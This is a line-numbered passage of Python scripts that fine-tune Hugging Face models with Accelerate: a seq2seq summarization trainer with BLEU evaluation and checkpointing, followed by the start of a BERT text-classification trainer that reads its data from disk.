477
+ import argparse
478
+ import json
479
+ import logging
480
+ import math
481
+ import os
482
+ import random
483
+ from pathlib import Path
484
+ from time import time
485
+ import datasets
486
+ import nltk
487
+ import numpy as np
488
+ import torch
489
+ from datasets import load_dataset, load_metric
490
+ from torch.utils.data import DataLoader
491
+ from tqdm.auto import tqdm
492
+ import transformers
493
+ from accelerate import Accelerator
494
+ from accelerate.logging import get_logger
495
+ from accelerate.utils import DummyOptim, DummyScheduler, set_seed
496
+ from filelock import FileLock
497
+ from huggingface_hub import Repository
498
+ from transformers import CONFIG_MAPPING, MODEL_MAPPING, AutoConfig, AutoModelForSeq2SeqLM, AutoTokenizer, DataCollatorForSeq2Seq, SchedulerType, get_scheduler
499
+ from transformers.utils import get_full_repo_name, is_offline_mode
500
+ from transformers.utils.versions import require_version
501
+ logger = get_logger(__name__)
502
+ require_version('datasets>=1.8.0', 'To fix: pip install -r examples/pytorch/summarization/requirements.txt')
503
+ MODEL_CONFIG_CLASSES = list(MODEL_MAPPING.keys())
504
+ MODEL_TYPES = tuple((conf.model_type for conf in MODEL_CONFIG_CLASSES))
505
+ try:
506
+ nltk.data.find('tokenizers/punkt')
507
+ except (LookupError, OSError):
508
+ if is_offline_mode():
509
+ raise LookupError('Offline mode: run this script without TRANSFORMERS_OFFLINE first to download nltk data files')
510
+ with FileLock('.lock') as lock:
511
+ nltk.download('punkt', quiet=True)
512
+
513
+ def parse_args():
514
+ parser = argparse.ArgumentParser(description='Finetune a transformers model on a summarization task')
515
+ parser.add_argument('--dataset_name', type=str, default=None, help='The name of the dataset to use (via the datasets library).')
516
+ parser.add_argument('--dataset_config_name', type=str, default=None, help='The configuration name of the dataset to use (via the datasets library).')
517
+ parser.add_argument('--train_file', type=str, default=None, help='A csv or a json file containing the training data.')
518
+ parser.add_argument('--validation_file', type=str, default=None, help='A csv or a json file containing the validation data.')
519
+ parser.add_argument('--ignore_pad_token_for_loss', type=bool, default=True, help='Whether to ignore the tokens corresponding to padded labels in the loss computation or not.')
520
+ parser.add_argument('--max_source_length', type=int, default=1024, help='The maximum total input sequence length after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded.')
521
+ parser.add_argument('--source_prefix', type=str, default=None, help='A prefix to add before every source text (useful for T5 models).')
522
+ parser.add_argument('--preprocessing_num_workers', type=int, default=None, help='The number of processes to use for the preprocessing.')
523
+ parser.add_argument('--overwrite_cache', type=bool, default=None, help='Overwrite the cached training and evaluation sets')
524
+ parser.add_argument('--max_target_length', type=int, default=128, help='The maximum total sequence length for target text after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.during ``evaluate`` and ``predict``.')
525
+ parser.add_argument('--val_max_target_length', type=int, default=None, help='The maximum total sequence length for validation target text after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`.This argument is also used to override the ``max_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
526
+ parser.add_argument('--val_min_target_length', type=int, default=10, help='The minimum total sequence length for validation target text after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`.This argument is also used to override the ``max_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
527
+ parser.add_argument('--n_train', type=int, default=2000, help='Number of training examples to use. If None, all training examples will be used.')
528
+ parser.add_argument('--n_val', type=int, default=500, help='Number of validation examples to use. If None, all validation examples will be used.')
529
+ parser.add_argument('--n_val_batch_generations', type=int, default=5, help='Number of validation examples to use. If None, all validation examples will be used.')
530
+ parser.add_argument('--max_length', type=int, default=128, help='The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded if `--pad_to_max_lengh` is passed.')
531
+ parser.add_argument('--num_beams', type=int, default=None, help='Number of beams to use for evaluation. This argument will be passed to ``model.generate``, which is used during ``evaluate`` and ``predict``.')
532
+ parser.add_argument('--pad_to_max_length', type=bool, default=False, help='If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.')
533
+ parser.add_argument('--model_name_or_path', type=str, help='Path to pretrained model or model identifier from huggingface.co/models.', required=False)
534
+ parser.add_argument('--config_name', type=str, default=None, help='Pretrained config name or path if not the same as model_name')
535
+ parser.add_argument('--tokenizer_name', type=str, default=None, help='Pretrained tokenizer name or path if not the same as model_name')
536
+ parser.add_argument('--text_column', type=str, default=None, help='The name of the column in the datasets containing the full texts (for summarization).')
537
+ parser.add_argument('--summary_column', type=str, default=None, help='The name of the column in the datasets containing the summaries (for summarization).')
538
+ parser.add_argument('--use_slow_tokenizer', type=bool, default=False, help='If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).')
539
+ parser.add_argument('--per_device_train_batch_size', type=int, default=8, help='Batch size (per device) for the training dataloader.')
540
+ parser.add_argument('--per_device_eval_batch_size', type=int, default=8, help='Batch size (per device) for the evaluation dataloader.')
541
+ parser.add_argument('--learning_rate', type=float, default=5e-05, help='Initial learning rate (after the potential warmup period) to use.')
542
+ parser.add_argument('--weight_decay', type=float, default=0.0, help='Weight decay to use.')
543
+ parser.add_argument('--num_train_epochs', type=int, default=3, help='Total number of training epochs to perform.')
544
+ parser.add_argument('--max_train_steps', type=int, default=None, help='Total number of training steps to perform. If provided, overrides num_train_epochs.')
545
+ parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='Number of updates steps to accumulate before performing a backward/update pass.')
546
+ parser.add_argument('--lr_scheduler_type', type=SchedulerType, default='linear', help='The scheduler type to use.', choices=['linear', 'cosine', 'cosine_with_restarts', 'polynomial', 'constant', 'constant_with_warmup'])
547
+ parser.add_argument('--num_warmup_steps', type=int, default=0, help='Number of steps for the warmup in the lr scheduler.')
548
+ parser.add_argument('--output_dir', type=str, default=None, help='Where to store the final model.')
549
+ parser.add_argument('--seed', type=int, default=None, help='A seed for reproducible training.')
550
+ parser.add_argument('--model_type', type=str, default=None, help='Model type to use if training from scratch.', choices=MODEL_TYPES)
551
+ parser.add_argument('--push_to_hub', type=bool, default=False, help='Whether or not to push the model to the Hub.')
552
+ parser.add_argument('--hub_model_id', type=str, help='The name of the repository to keep in sync with the local `output_dir`.')
553
+ parser.add_argument('--hub_token', type=str, help='The token to use to push to the Model Hub.')
554
+ parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
555
+ parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
556
+ parser.add_argument('--load_best_model', type=bool, default=False, help='Whether to load the best model at the end of training')
557
+ parser.add_argument('--logging_steps', type=int, default=None, help='log every n steps')
558
+ parser.add_argument('--with_tracking', type=bool, default=False, help='Whether to enable experiment trackers for logging.')
559
+ parser.add_argument('--report_to', type=str, default='all', help='The integration to report the results and logs to. Supported platforms are `"tensorboard"`, `"wandb"` and `"comet_ml"`. Use `"all"` (default) to report to all integrations.Only applicable when `--with_tracking` is passed.')
560
+ parser.add_argument('--report_name', type=str, default='chatbot_no_trainer', help='The name of the experiment tracking folder. Only applicable when `--with_tracking` is passed.')
561
+ args = parser.parse_args()
562
+ if args.dataset_name is None and args.train_file is None and (args.validation_file is None):
563
+ raise ValueError('Need either a dataset name or a training/validation file.')
564
+ else:
565
+ if args.train_file is not None:
566
+ extension = args.train_file.split('.')[-1]
567
+ assert extension in ['csv', 'json'], '`train_file` should be a csv or a json file.'
568
+ if args.validation_file is not None:
569
+ extension = args.validation_file.split('.')[-1]
570
+ assert extension in ['csv', 'json'], '`validation_file` should be a csv or a json file.'
571
+ if args.push_to_hub:
572
+ assert args.output_dir is not None, 'Need an `output_dir` to create a repo when `--push_to_hub` is passed.'
573
+ return args
574
+
575
+ def checkpoint_model(checkpoint_folder, ckpt_id, model, epoch, last_global_step, **kwargs):
576
+ checkpoint_state_dict = {'epoch': epoch, 'last_global_step': last_global_step}
577
+ checkpoint_state_dict.update(kwargs)
578
+ success = model.save_checkpoint(checkpoint_folder, ckpt_id, checkpoint_state_dict)
579
+ status_msg = f'checkpointing: checkpoint_folder={checkpoint_folder}, ckpt_id={ckpt_id}'
580
+ if success:
581
+ logging.info(f'Success {status_msg}')
582
+ else:
583
+ logging.warning(f'Failure {status_msg}')
584
+ return
585
+
586
+ def evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, max_length):
587
+ accelerator.print('starting evaluation')
588
+ count_printed = 0
589
+
590
+ def postprocess_text(preds, labels):
591
+ preds = [pred.strip() for pred in preds]
592
+ labels = [[label.strip()] for label in labels]
593
+ return (preds, labels)
594
+ model.eval()
595
+ if args.val_max_target_length is None:
596
+ args.val_max_target_length = args.max_target_length
597
+ gen_kwargs = {'max_length': args.val_max_target_length if args is not None else max_length, 'num_beams': args.num_beams, 'min_length': args.val_min_target_length, 'length_penalty': False, 'no_repeat_ngram_size': 3, 'encoder_no_repeat_ngram_size': 3, 'repetition_penalty': 1.2}
598
+ samples_seen = 0
599
+ for (step, batch) in enumerate(eval_dataloader):
600
+ with torch.no_grad():
601
+ generated_tokens = accelerator.unwrap_model(model).generate(batch['input_ids'], attention_mask=batch['attention_mask'], **gen_kwargs)
602
+ generated_tokens = accelerator.pad_across_processes(generated_tokens, dim=1, pad_index=tokenizer.pad_token_id)
603
+ labels = batch['labels']
604
+ if not args.pad_to_max_length:
605
+ labels = accelerator.pad_across_processes(batch['labels'], dim=1, pad_index=tokenizer.pad_token_id)
606
+ (generated_tokens, labels) = accelerator.gather((generated_tokens, labels))
607
+ generated_tokens = generated_tokens.cpu().numpy()
608
+ labels = labels.cpu().numpy()
609
+ if args.ignore_pad_token_for_loss:
610
+ labels = np.where(labels != -100, labels, tokenizer.pad_token_id)
611
+ decoded_preds = tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
612
+ decoded_labels = tokenizer.batch_decode(labels, skip_special_tokens=True)
613
+ if count_printed < args.n_val_batch_generations:
614
+ logger.info('printing few sample generations and corresponding labels from eval set')
615
+ logger.info('prompt | generated | label')
616
+ decoded_prompts = tokenizer.batch_decode(batch['input_ids'], skip_special_tokens=False)
617
+ for (prompt, generated_response, response) in zip(decoded_prompts, decoded_preds, decoded_labels):
618
+ cleaned_prompt = prompt.replace('<pad>', '').strip()
619
+ logger.info(f'{cleaned_prompt} | {generated_response} | {response}')
620
+ count_printed += 1
621
+ (decoded_preds, decoded_labels) = postprocess_text(decoded_preds, decoded_labels)
622
+ if accelerator.num_processes > 1:
623
+ if step == len(eval_dataloader) - 1:
624
+ decoded_preds = decoded_preds[:len(eval_dataloader.dataset) - samples_seen]
625
+ decoded_labels = decoded_labels[:len(eval_dataloader.dataset) - samples_seen]
626
+ else:
627
+ samples_seen += len(decoded_labels)
628
+ metric.add_batch(predictions=decoded_preds, references=decoded_labels)
629
+ result = metric.compute()
630
+ logger.info({'bleu': result['score']})
631
+ accelerator.print('evaluation completed')
632
+ return result['score']
633
+
634
+ def load_training_checkpoint(model, load_dir, tag=None, **kwargs):
635
+ (_, checkpoint_state_dict) = model.load_checkpoint(load_dir, tag=tag, **kwargs)
636
+ epoch = checkpoint_state_dict['epoch']
637
+ last_global_step = checkpoint_state_dict['last_global_step']
638
+ del checkpoint_state_dict
639
+ return (epoch, last_global_step)
640
+
641
+ def main():
642
+ args = parse_args()
643
+ accelerator = Accelerator(log_with=args.report_to, logging_dir=args.output_dir) if args.with_tracking else Accelerator()
644
+ if args.source_prefix is None and args.model_name_or_path in ['t5-small', 't5-base', 't5-large', 't5-3b', 't5-11b']:
645
+ logger.warning("You're running a t5 model but didn't provide a source prefix, which is the expected, e.g. with `--source_prefix 'summarize: ' `")
646
+ logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO)
647
+ logger.info(accelerator.state, main_process_only=False)
648
+ if accelerator.is_local_main_process:
649
+ datasets.utils.logging.set_verbosity_warning()
650
+ transformers.utils.logging.set_verbosity_info()
651
+ else:
652
+ datasets.utils.logging.set_verbosity_error()
653
+ transformers.utils.logging.set_verbosity_error()
654
+ if args.seed is not None:
655
+ set_seed(args.seed)
656
+ if accelerator.is_main_process:
657
+ if args.push_to_hub:
658
+ if args.hub_model_id is None:
659
+ repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token)
660
+ else:
661
+ repo_name = args.hub_model_id
662
+ repo = Repository(args.output_dir, clone_from=repo_name)
663
+ with open(os.path.join(args.output_dir, '.gitignore'), 'w+') as gitignore:
664
+ if 'step_*' not in gitignore:
665
+ gitignore.write('step_*\n')
666
+ if 'epoch_*' not in gitignore:
667
+ gitignore.write('epoch_*\n')
668
+ elif args.output_dir is not None:
669
+ os.makedirs(args.output_dir, exist_ok=True)
670
+ accelerator.wait_for_everyone()
671
+ if args.dataset_name is not None:
672
+ raw_datasets = load_dataset(args.dataset_name, args.dataset_config_name)
673
+ if args.n_train > 0:
674
+ raw_datasets['train'] = datasets.Dataset.from_dict(raw_datasets['train'][:args.n_train])
675
+ if args.n_val > 0:
676
+ raw_datasets['validation'] = datasets.Dataset.from_dict(raw_datasets['validation'][:args.n_val])
677
+ else:
678
+ data_files = {}
679
+ if args.train_file is not None:
680
+ data_files['train'] = args.train_file
681
+ if args.validation_file is not None:
682
+ data_files['validation'] = args.validation_file
683
+ extension = args.train_file.split('.')[-1]
684
+ raw_datasets = load_dataset(extension, data_files=data_files)
685
+ if args.config_name:
686
+ config = AutoConfig.from_pretrained(args.config_name)
687
+ elif args.model_name_or_path:
688
+ config = AutoConfig.from_pretrained(args.model_name_or_path)
689
+ else:
690
+ config = CONFIG_MAPPING[args.model_type]()
691
+ logger.warning('You are instantiating a new config instance from scratch.')
692
+ if args.tokenizer_name:
693
+ tokenizer = AutoTokenizer.from_pretrained(args.tokenizer_name, use_fast=not args.use_slow_tokenizer)
694
+ elif args.model_name_or_path:
695
+ tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)
696
+ else:
697
+ raise ValueError('You are instantiating a new tokenizer from scratch. This is not supported by this script.You can do it from another script, save it, and load it from here, using --tokenizer_name.')
698
+ if args.model_name_or_path:
699
+ model = AutoModelForSeq2SeqLM.from_pretrained(args.model_name_or_path, from_tf=bool('.ckpt' in args.model_name_or_path), config=config)
700
+ else:
701
+ logger.info('Training new model from scratch')
702
+ model = AutoModelForSeq2SeqLM.from_config(config)
703
+ model.resize_token_embeddings(len(tokenizer))
704
+ if model.config.decoder_start_token_id is None:
705
+ raise ValueError('Make sure that `config.decoder_start_token_id` is correctly defined')
706
+ prefix = args.source_prefix if args.source_prefix is not None else ''
707
+ column_names = raw_datasets['train'].column_names
708
+ dataset_columns = column_names
709
+ if args.text_column is None:
710
+ text_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
711
+ else:
712
+ text_column = args.text_column
713
+ if text_column not in column_names:
714
+ raise ValueError(f"--text_column' value '{args.text_column}' needs to be one of: {', '.join(column_names)}")
715
+ if args.summary_column is None:
716
+ summary_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
717
+ else:
718
+ summary_column = args.summary_column
719
+ if summary_column not in column_names:
720
+ raise ValueError(f"--summary_column' value '{args.summary_column}' needs to be one of: {', '.join(column_names)}")
721
+ max_target_length = args.max_target_length
722
+ padding = 'max_length' if args.pad_to_max_length else False
723
+
724
+ def preprocess_function(examples):
725
+ inputs = examples[text_column]
726
+ targets = examples[summary_column]
727
+ inputs = [prefix + inp for inp in inputs]
728
+ model_inputs = tokenizer(inputs, max_length=args.max_source_length, padding=padding, truncation=True)
729
+ if 't5' in args.model_name_or_path:
730
+ with tokenizer.as_target_tokenizer():
731
+ labels = tokenizer(targets, max_length=max_target_length, padding=padding, truncation=True)
732
+ else:
733
+ labels = tokenizer(targets, max_length=max_target_length, padding=padding, truncation=True)
734
+ if padding == 'max_length' and args.ignore_pad_token_for_loss:
735
+ labels['input_ids'] = [[l if l != tokenizer.pad_token_id else -100 for l in label] for label in labels['input_ids']]
736
+ model_inputs['labels'] = labels['input_ids']
737
+ return model_inputs
738
+ with accelerator.main_process_first():
739
+ processed_datasets = raw_datasets.map(preprocess_function, batched=True, num_proc=args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not args.overwrite_cache, desc='Running tokenizer on dataset')
740
+ train_dataset = processed_datasets['train']
741
+ eval_dataset = processed_datasets['validation']
742
+ for index in random.sample(range(len(train_dataset)), 1):
743
+ logger.info(f'Sample {index} of the training set: {train_dataset[index]}.')
744
+ label_pad_token_id = -100 if args.ignore_pad_token_for_loss else tokenizer.pad_token_id
745
+ data_collator = DataCollatorForSeq2Seq(tokenizer, model=model, label_pad_token_id=label_pad_token_id, pad_to_multiple_of=8 if accelerator.use_fp16 else None)
746
+ train_dataloader = DataLoader(train_dataset, shuffle=True, collate_fn=data_collator, batch_size=args.per_device_train_batch_size)
747
+ eval_dataloader = DataLoader(eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size)
748
+ no_decay = ['bias', 'LayerNorm.weight']
749
+ optimizer_grouped_parameters = [{'params': [p for (n, p) in model.named_parameters() if not any((nd in n for nd in no_decay))], 'weight_decay': args.weight_decay}, {'params': [p for (n, p) in model.named_parameters() if any((nd in n for nd in no_decay))], 'weight_decay': 0.0}]
750
+ optimizer_cls = torch.optim.Adam if accelerator.state.deepspeed_plugin is None or 'optimizer' not in accelerator.state.deepspeed_plugin.deepspeed_config else DummyOptim
751
+ optimizer = optimizer_cls(optimizer_grouped_parameters, lr=args.learning_rate)
752
+ if accelerator.state.deepspeed_plugin is not None:
753
+ args.gradient_accumulation_steps = accelerator.state.deepspeed_plugin.deepspeed_config['gradient_accumulation_steps']
754
+ num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
755
+ if args.max_train_steps is None:
756
+ args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
757
+ else:
758
+ args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
759
+ if accelerator.state.deepspeed_plugin is None or 'scheduler' not in accelerator.state.deepspeed_plugin.deepspeed_config:
760
+ lr_scheduler = get_scheduler(name=args.lr_scheduler_type, optimizer=optimizer, num_warmup_steps=args.num_warmup_steps, num_training_steps=args.max_train_steps)
761
+ else:
762
+ lr_scheduler = DummyScheduler(optimizer, total_num_steps=args.max_train_steps, warmup_num_steps=args.num_warmup_steps)
763
+ (model, optimizer, train_dataloader, eval_dataloader, lr_scheduler) = accelerator.prepare(model, optimizer, train_dataloader, eval_dataloader, lr_scheduler)
764
+ num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
765
+ args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
766
+ if hasattr(args.checkpointing_steps, 'isdigit'):
767
+ checkpointing_steps = args.checkpointing_steps
768
+ if args.checkpointing_steps.isdigit():
769
+ checkpointing_steps = int(args.checkpointing_steps)
770
+ else:
771
+ checkpointing_steps = None
772
+ if args.with_tracking:
773
+ if accelerator.is_main_process:
774
+ experiment_config = vars(args)
775
+ experiment_config['lr_scheduler_type'] = experiment_config['lr_scheduler_type'].value
776
+ accelerator.init_trackers(args.report_name, experiment_config)
777
+ metric = load_metric('sacrebleu')
778
+ total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps
779
+ logger.info('***** Running training *****')
780
+ logger.info(f' Num examples = {len(train_dataset)}')
781
+ logger.info(f' Num Epochs = {args.num_train_epochs}')
782
+ logger.info(f' Instantaneous batch size per device = {args.per_device_train_batch_size}')
783
+ logger.info(f' Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}')
784
+ logger.info(f' Gradient Accumulation steps = {args.gradient_accumulation_steps}')
785
+ logger.info(f' Total optimization steps = {args.max_train_steps}')
786
+ progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
787
+ completed_steps = 0
788
+ starting_epoch = 0
789
+ best_metric = None
790
+ best_metric_checkpoint = None
791
+ if args.resume_from_checkpoint:
792
+ (_, last_global_step) = load_training_checkpoint(model, args.resume_from_checkpoint, **{'load_optimizer_states': True, 'load_lr_scheduler_states': True})
793
+ accelerator.print(f'Resumed from checkpoint: {args.resume_from_checkpoint}')
794
+ resume_step = last_global_step
795
+ starting_epoch = resume_step // len(train_dataloader)
796
+ resume_step -= starting_epoch * len(train_dataloader)
797
+ for epoch in range(starting_epoch, args.num_train_epochs):
798
+ start_time = time()
799
+ model.train()
800
+ if args.with_tracking:
801
+ total_loss = 0
802
+ for (step, batch) in enumerate(train_dataloader):
803
+ if args.resume_from_checkpoint and epoch == starting_epoch:
804
+ if resume_step is not None and step < resume_step:
805
+ completed_steps += 1
806
+ continue
807
+ decoder_input_ids = batch['labels'].new_zeros(batch['labels'].shape)
808
+ decoder_input_ids[..., 1:] = batch['labels'][..., :-1].clone()
809
+ decoder_input_ids[..., 0] = 0
810
+ decoder_input_ids.masked_fill_(decoder_input_ids == -100, 0)
811
+ batch['decoder_input_ids'] = decoder_input_ids
812
+ outputs = model(**batch)
813
+ loss = outputs.loss
814
+ if args.with_tracking:
815
+ total_loss += loss.detach().float()
816
+ loss = loss / args.gradient_accumulation_steps
817
+ accelerator.backward(loss)
818
+ if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:
819
+ optimizer.step()
820
+ lr_scheduler.step()
821
+ optimizer.zero_grad()
822
+ progress_bar.update(1)
823
+ completed_steps += 1
824
+ if isinstance(args.logging_steps, int):
825
+ if completed_steps % args.logging_steps == 0:
826
+ steps_this_epoch = completed_steps % len(train_dataloader)
827
+ train_loss = total_loss.item() / steps_this_epoch
828
+ train_perplexity = math.exp(train_loss)
829
+ accelerator.log({'train_loss': train_loss, 'train_perplexity': train_perplexity, 'epoch': epoch, 'step': completed_steps, 'steps_this_epoch': steps_this_epoch}, step=completed_steps)
830
+ logger.info(f'Epoch: {epoch}, Step: {completed_steps}, Loss: {train_loss}, Perplexity: {train_perplexity}')
831
+ if isinstance(checkpointing_steps, int):
832
+ if completed_steps % checkpointing_steps == 0:
833
+ if accelerator.state.deepspeed_plugin is not None:
834
+ checkpoint_model(args.output_dir, epoch, model, epoch, completed_steps)
835
+ else:
836
+ accelerator.wait_for_everyone()
837
+ if accelerator.is_main_process:
838
+ ckpt_path = os.path.join(args.output_dir, str(epoch))
839
+ os.makedirs(ckpt_path, exist_ok=True)
840
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(ckpt_path, 'model.pt'))
841
+ if completed_steps >= args.max_train_steps:
842
+ break
843
+ end_time = time()
844
+ logger.info(f'Epoch {epoch} training took {end_time - start_time} seconds')
845
+ if accelerator.state.deepspeed_plugin is not None:
846
+ checkpoint_model(args.output_dir, epoch, model, epoch, completed_steps)
847
+ else:
848
+ accelerator.wait_for_everyone()
849
+ if accelerator.is_main_process:
850
+ ckpt_path = os.path.join(args.output_dir, str(epoch))
851
+ os.makedirs(ckpt_path, exist_ok=True)
852
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(ckpt_path, 'model.pt'))
853
+ start_time = time()
854
+ bleu_score = evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, config.max_length)
855
+ end_time = time()
856
+ logger.info(f'Epoch {epoch} evaluation took {end_time - start_time} seconds')
857
+ result = {}
858
+ if args.with_tracking:
859
+ result['bleu_score'] = bleu_score
860
+ result['train_loss'] = total_loss.item() / len(train_dataloader)
861
+ result['train_perplexity'] = math.exp(result['train_loss'])
862
+ result['epoch'] = epoch
863
+ result['step'] = completed_steps
864
+ accelerator.log(result, step=completed_steps)
865
+ if (best_metric is None or best_metric < bleu_score) and args.load_best_model:
866
+ best_metric = bleu_score
867
+ best_metric_checkpoint = os.path.join(args.output_dir, str(epoch))
868
+ accelerator.print(f'New best metric: {best_metric} at epoch {epoch}')
869
+ accelerator.print(f'best_metric_checkpoint: {best_metric_checkpoint}')
870
+ if args.load_best_model:
871
+ if accelerator.state.deepspeed_plugin is not None:
872
+ (_, last_global_step) = load_training_checkpoint(model, '/'.join(best_metric_checkpoint.split('/')[:-1]), tag=best_metric_checkpoint.split('/')[-1], **{'load_optimizer_states': True, 'load_lr_scheduler_states': True})
873
+ else:
874
+ map_location = {'cuda:0': 'cuda:{}'.format(accelerator.local_process_index)}
875
+ model.load_state_dict(torch.load(os.path.join(best_metric_checkpoint, 'model.pt'), map_location=map_location))
876
+ bleu_score = evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, config.max_length)
877
+ logger.info(f'Best model metrics: bleu_score: {bleu_score}')
878
+ if bleu_score != best_metric:
879
+ raise AssertionError(f'Best metric {best_metric} does not match the metric {bleu_score} of the loaded best model.')
880
+ if args.output_dir is not None:
881
+ accelerator.wait_for_everyone()
882
+ unwrapped_model = accelerator.unwrap_model(model)
883
+ unwrapped_model.save_pretrained(args.output_dir, is_main_process=accelerator.is_main_process, save_function=accelerator.save, state_dict=accelerator.get_state_dict(model))
884
+ if accelerator.is_main_process:
885
+ tokenizer.save_pretrained(args.output_dir)
886
+ if args.push_to_hub:
887
+ repo.push_to_hub(commit_message='End of training', auto_lfs_prune=True)
888
+ with open(os.path.join(args.output_dir, 'all_results.json'), 'w') as f:
889
+ json.dump({'eval_bleu': bleu_score}, f)
890
+ if __name__ == '__main__':
891
+ main()
892
+
893
+ # File: notebooks-main/sagemaker/22_accelerate_sagemaker_examples/src/text-classification/train_using_s3_data.py
894
+ import argparse
895
+ import os
896
+ import torch
897
+ from torch.optim import AdamW
898
+ from torch.utils.data import DataLoader
899
+ import evaluate
900
+ from accelerate import Accelerator, DistributedType
901
+ from datasets import load_from_disk
902
+ from transformers import AutoModelForSequenceClassification, AutoTokenizer, get_linear_schedule_with_warmup, set_seed
903
+ MAX_GPU_BATCH_SIZE = 16
904
+ EVAL_BATCH_SIZE = 32
905
+
906
+ def training_function(config, args):
907
+ if args.with_tracking:
908
+ accelerator = Accelerator(cpu=args.cpu, mixed_precision=args.mixed_precision, log_with='all', logging_dir=args.logging_dir)
909
+ else:
910
+ accelerator = Accelerator(cpu=args.cpu, mixed_precision=args.mixed_precision)
911
+ if hasattr(args.checkpointing_steps, 'isdigit'):
912
+ if args.checkpointing_steps == 'epoch':
913
+ checkpointing_steps = args.checkpointing_steps
914
+ elif args.checkpointing_steps.isdigit():
915
+ checkpointing_steps = int(args.checkpointing_steps)
916
+ else:
917
+ raise ValueError(f'Argument `checkpointing_steps` must be either a number or `epoch`. `{args.checkpointing_steps}` passed.')
918
+ else:
919
+ checkpointing_steps = None
920
+ lr = config['lr']
921
+ num_epochs = int(config['num_epochs'])
922
+ seed = int(config['seed'])
923
+ batch_size = int(config['batch_size'])
924
+ if args.with_tracking:
925
+ run = os.path.split(__file__)[-1].split('.')[0]
926
+ accelerator.init_trackers(run, config)
927
+ tokenizer = AutoTokenizer.from_pretrained('bert-base-cased')
928
+ metric = evaluate.load('glue', 'mrpc')
929
+ gradient_accumulation_steps = 1
930
+ if batch_size > MAX_GPU_BATCH_SIZE and accelerator.distributed_type != DistributedType.TPU:
931
+ gradient_accumulation_steps = batch_size // MAX_GPU_BATCH_SIZE
932
+ batch_size = MAX_GPU_BATCH_SIZE
933
+
934
+ def collate_fn(examples):
935
+ if accelerator.distributed_type == DistributedType.TPU:
936
+ return tokenizer.pad(examples, padding='max_length', max_length=128, return_tensors='pt')
937
+ return tokenizer.pad(examples, padding='longest', return_tensors='pt')
938
+ train_dataset = load_from_disk(args.training_dir)
939
+ validation_dataset = load_from_disk(args.validation_dir)
940
+ accelerator.print(f' loaded train_dataset length is: {len(train_dataset)}')
941
+ accelerator.print(f' loaded test_dataset length is: {len(validation_dataset)}')
942
+ train_dataloader = DataLoader(train_dataset, shuffle=True, collate_fn=collate_fn, batch_size=batch_size)
943
+ eval_dataloader = DataLoader(validation_dataset, shuffle=False, collate_fn=collate_fn, batch_size=EVAL_BATCH_SIZE)
944
+ set_seed(seed)
945
+ model = AutoModelForSequenceClassification.from_pretrained('bert-base-cased', return_dict=True)
946
+ model = model.to(accelerator.device)
947
+ optimizer = AdamW(params=model.parameters(), lr=lr)
948
+ lr_scheduler = get_linear_schedule_with_warmup(optimizer=optimizer, num_warmup_steps=100, num_training_steps=len(train_dataloader) * num_epochs // gradient_accumulation_steps)
949
+ (model, optimizer, train_dataloader, eval_dataloader, lr_scheduler) = accelerator.prepare(model, optimizer, train_dataloader, eval_dataloader, lr_scheduler)
950
+ overall_step = 0
951
+ starting_epoch = 0
952
+ if args.resume_from_checkpoint:
953
+ if args.resume_from_checkpoint is not None or args.resume_from_checkpoint != '':
954
+ accelerator.print(f'Resumed from checkpoint: {args.resume_from_checkpoint}')
955
+ accelerator.load_state(args.resume_from_checkpoint)
956
+ path = os.path.basename(args.resume_from_checkpoint)
957
+ else:
958
+ dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
959
+ dirs.sort(key=os.path.getctime)
960
+ path = dirs[-1]
961
+ training_difference = os.path.splitext(path)[0]
962
+ if 'epoch' in training_difference:
963
+ starting_epoch = int(training_difference.replace('epoch_', '')) + 1
964
+ resume_step = None
965
+ else:
966
+ resume_step = int(training_difference.replace('step_', ''))
967
+ starting_epoch = resume_step // len(train_dataloader)
968
+ resume_step -= starting_epoch * len(train_dataloader)
969
+ for epoch in range(starting_epoch, num_epochs):
970
+ model.train()
971
+ if args.with_tracking:
972
+ total_loss = 0
973
+ for (step, batch) in enumerate(train_dataloader):
974
+ if args.resume_from_checkpoint and epoch == starting_epoch:
975
+ if resume_step is not None and step < resume_step:
976
+ overall_step += 1
977
+ continue
978
+ batch.to(accelerator.device)
979
+ outputs = model(**batch)
980
+ loss = outputs.loss
981
+ loss = loss / gradient_accumulation_steps
982
+ if args.with_tracking:
983
+ total_loss += loss.detach().float()
984
+ accelerator.backward(loss)
985
